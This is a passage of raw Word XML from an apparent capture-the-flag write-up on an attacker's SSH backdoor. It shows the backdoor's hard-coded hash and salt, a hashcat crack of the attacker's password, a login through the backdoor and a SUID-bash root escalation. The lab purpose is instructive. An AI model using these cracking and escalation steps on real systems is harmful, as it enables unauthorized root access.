          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It loads a private key (id_rsa) to present a normal-looking SSH server banner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Login is gated by a verifyPass() function that computes SHA-512(password + salt) and compares it against a hard-coded expected hash — not a standard system password check.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both the expected hash and the salt are hard-coded constants near the top of main.go, which is exactly what makes this backdoor crackable if an analyst can recover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val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Default/hard-coded hash in the source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hard-coded salt in the source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1c362db832f3f864c8c2fe05f2002a05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Recovering the attacker's own hash from the PCAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Going back to the same command the attacker used to launch the backdoor (visible in the TCP stream) shows it was started with a -a flag, supplying a custom hash — meaning the attacker did not keep the tool's default password, but rather set their own.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">./ssh-backdoor -a &lt;attacker_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash the attacker supplied on the command line:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c565401929</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Cracking the attacker's password with hashcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowing from the source that the algorithm is SHA-512(password.salt), the correct hashcat mode is 1710 (sha512($pass.$salt)). The hash and salt are combined into a single line separated by a colon, and hashcat is run against rockyou.txt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '&lt;hash&gt;:&lt;salt&gt;' &gt; hash.txt
hashcat -m 1710 -a 0 hash.txt /opt/rockyou.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracked password for the backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">november16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E0A800" w:sz="18" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
        <w:ind w:left="150" w:right="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="664D03"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Why mode 1710 and not John here: John the Ripper's default modes don't cleanly express an arbitrary salted SHA-512 concatenation the way hashcat's mode catalogue does; picking the mode that matches the exact construction used in verifyPass() (hash = SHA512(pass + salt)) is what makes the crack succeed quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Part 3 — Attack: Regaining Access to the Production Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the box redeployed, the goal shifts from passive analysis to actively using everything gathered to log back in — legitimately, within the room's authorized scope — and confirm full compromise recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Re-enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC -sV -A &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The scan confirms an SSH-like service listening on TCP/2222 — exactly the port the attacker's backdoor used — in addition to the standard web ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Confirming the defacement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Visiting the site in a browser shows the attacker left a defacement message as the page heading (an act of impact/visibility, separate from their quieter backdoor persistence):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">H4ck3d by CooctusClan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Logging back in through the attacker's own backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the backdoor doesn't validate the OS username against a real account, the defender can connect as effectively any username on port 2222 and authenticate purely with the cracked password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -p 2222 james@&lt;target-ip&gt;
# password: november16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 Capturing the user flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The session lands in the directory where the attacker originally built and ran the backdoor. Moving to james's home directory reveals the user flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/james
cat user.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Privilege escalation to root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rather than running a lengthy enumeration script, checking hidden files in the working directory first (ls -la) — a very common low-hanging-fruit habit in CTFs and real assessments alike — reveals a suspicious SUID binary the attacker had planted for themselves:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la ~/.overpass
# -rwsr-xr-x 1 root root  .suid_bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A SUID binary owned by root that is a bash interpreter is effectively an instant root shell — but bash drops elevated privileges by default unless invoked with -p (preserve privileges):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">./.suid_bash -p
id
# uid=1000(james) gid=1000(james) euid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With an effective UID of 0, the shell has root's permissions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D1B2A" w:val="clear"/>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7FFFD4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /root
cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Attack Chain Summary (Mapped to MITRE ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconstructing the full chain end-to-end is one of the most useful outcomes of this room — it turns a list of CTF answers into a coherent incident timeline that a real SOC report would use.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00"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ATT&amp;CK Reference (indicative)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance / Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery of an unlinked /development/ page and abuse of an insecure file-upload feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1190 – Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>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PHP exec() spawning a Netcat mkfifo reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1059 – Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
